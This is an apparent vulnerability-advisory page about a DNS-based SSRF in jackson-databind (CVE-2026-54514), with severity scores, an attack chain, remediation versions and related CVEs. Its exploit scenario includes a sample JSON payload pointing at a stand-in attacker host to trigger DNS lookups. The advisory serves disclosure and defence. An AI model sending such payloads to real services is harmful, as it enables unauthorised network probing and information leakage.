Skip to main content

jackson-databind EUVDEUVD-2026-38592

| CVE-2026-54514 MEDIUM
Server-Side Request Forgery (SSRF) (CWE-918)
2026-06-23 security-advisories@github.com GHSA-hgj6-7826-r7m5
5.3
CVSS 3.1 · Vendor: github
Share

Severity by source

Vendor (github) PRIMARY
5.3 MEDIUM
AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
vuln.today AI
5.3 MEDIUM

Network-reachable endpoint, no auth required; impact is DNS-based information leakage only, with no integrity or availability consequence.

3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
SUSE
MEDIUM
qualitative

Primary rating from Vendor (github).

CVSS VectorVendor: github

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
None
Availability
None

Lifecycle Timeline

3
Patch available
Jun 23, 2026 - 22:02 EUVD
Source Code Evidence Fetched
Jun 23, 2026 - 21:35 vuln.today
Analysis Generated
Jun 23, 2026 - 21:35 vuln.today

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 282 maven packages depend on com.fasterxml.jackson.core:jackson-databind (50 direct, 234 indirect)

Ecosystem-wide dependent count for version 2.0.0.

DescriptionCVE.org

jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.0.0 until 2.18.8, 2.21.4, and 3.1.4, JDKFromStringDeserializer constructed InetSocketAddress with new InetSocketAddress(host, port), which performs eager DNS name resolution for hostname inputs at deserialization time. An application that binds untrusted JSON into a type containing an InetSocketAddress field issues an attacker-chosen DNS query during readValue, before any application-level validation or connect logic. The fix uses InetSocketAddress.createUnresolved(host, port), deferring DNS to an explicit connect. This vulnerability is fixed in 2.18.8, 2.21.4, and 3.1.4.

AnalysisAI

Eager DNS resolution during InetSocketAddress deserialization in jackson-databind (versions 2.0.0 through pre-fix releases across the 2.18, 2.21, and 3.x lines) allows any attacker who can supply untrusted JSON to an affected endpoint to force outbound DNS lookups for attacker-chosen hostnames at readValue() time - before application validation or connect logic can intervene. This DNS-based SSRF (CWE-918) enables internal resolver probing, network topology enumeration, and DNS out-of-band interaction signals against applications that deserialize untrusted JSON into types containing InetSocketAddress fields. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Send crafted JSON with attacker-controlled hostname to public endpoint
Delivery
jackson-databind readValue() constructs InetSocketAddress via new InetSocketAddress(host, port)
Exploit
JVM synchronously queries application DNS resolver for attacker hostname
Execution
DNS query traverses internal resolver infrastructure
Persist
Attacker observes query on authoritative DNS server
Impact
Internal resolver addresses and naming scheme enumerated

Vulnerability AssessmentAI

Exploitation The application must deserialize untrusted JSON via jackson-databind's readValue() (or equivalent, such as Spring MVC's @RequestBody automatic binding) into a Java type containing an InetSocketAddress field - either at the top level of the target type or nested within it. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) accurately reflects the limited but real impact: unauthenticated network attackers can trigger the DNS lookup without any special configuration on their part, but the attainable impact is narrowly bounded to DNS-based information leakage - no TCP connection is established, no response data is retrieved, and there is no integrity or availability impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker submits a crafted HTTP POST body containing JSON such as {"target": "attacker-ns.evil.example.com:443"} to a REST endpoint that deserializes the payload into a Java POJO with an InetSocketAddress field. At the moment ObjectMapper.readValue() executes, jackson-databind calls new InetSocketAddress(host, port) and the JVM synchronously queries the application server's configured DNS resolver for attacker-ns.evil.example.com - before the application's input validation fires. …
Remediation Upgrade jackson-databind to a fixed release: 2.18.8 for the 2.18.x line, 2.21.4 for the 2.19-2.21 line, or 3.1.4 for the 3.x line - all released 2026-06-04 and confirmed via git tag analysis in GHSA-hgj6-7826-r7m5. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2020-11113 HIGH
8.8 Mar 31

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, rela

CVE-2020-35728 HIGH
8.1 Dec 27

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, rela

CVE-2020-9548 CRITICAL POC
9.8 Mar 02

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, rela

CVE-2020-9547 CRITICAL POC
9.8 Mar 02

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, rela

CVE-2020-36183 HIGH POC
8.1 Jan 07

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, rela

CVE-2020-35491 HIGH POC
8.1 Dec 17

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, rela

CVE-2020-35490 HIGH POC
8.1 Dec 17

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, rela

CVE-2022-42004 HIGH POC
7.5 Oct 02

In FasterXML jackson-databind before 2.13.4, resource exhaustion can occur because of a lack of a check in BeanDeseriali

CVE-2022-42003 HIGH POC
7.5 Oct 02

In FasterXML jackson-databind before versions 2.13.4.1 and 2.12.17.1, resource exhaustion can occur because of a lack of

CVE-2019-12086 HIGH POC
7.5 May 17

A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. Rated high severity (CVSS 7.5)

CVE-2020-9546 CRITICAL
9.8 Mar 02

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, rela

CVE-2020-11112 HIGH
8.8 Mar 31

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, rela

Vendor StatusVendor

SUSE

Severity: Moderate
Product Status
openSUSE Tumbleweed Fixed
SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS Affected
SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS Affected
SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS Affected
SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS Affected

Share

EUVD-2026-38592 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy